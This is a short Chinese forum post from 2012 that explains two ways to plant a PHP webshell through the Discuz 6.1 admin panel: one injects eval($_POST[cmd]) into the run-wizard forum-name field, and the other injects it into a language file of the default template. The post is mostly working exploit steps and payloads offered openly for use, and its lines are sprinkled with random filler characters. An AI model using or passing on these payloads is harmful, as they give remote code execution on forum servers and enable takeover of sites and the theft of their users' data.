discuz6.1两种方法后台拿shell: a+ ?' M1 G1 R- y
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下4 W1 a5 z% m# |( \7 n9 g
1:- t4 j/ k7 u+ O I* ?: ^
http://127.0.0.1/discuz/admincp. ... zard&frames=yes0 l; _$ A) p* V- L! b6 G* R
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
! L' m9 l, _5 |7 Z& j% O8 V<?php eval($_POST[cmd]);?>
" ]" Z! P& @0 w: P后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
$ t! @- Y- n O! F' w7 d2 _; `. O9 T4 z# y0 q5 |: A" m9 ?
" w% A. d$ M2 v. u( r1 G! M
2:后台模板管理--默认模板套系--详情7 z/ c$ c, l$ Q2 U% \
templates/default/actions.lang.php
9 P$ ?7 M, ]5 ~/ D& K1 njhackj\\');eval($_POST[cmd])?>;//
: b* i; P6 k( g7 m& G7 k& `* `2 _6 G s; {- c: ?
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对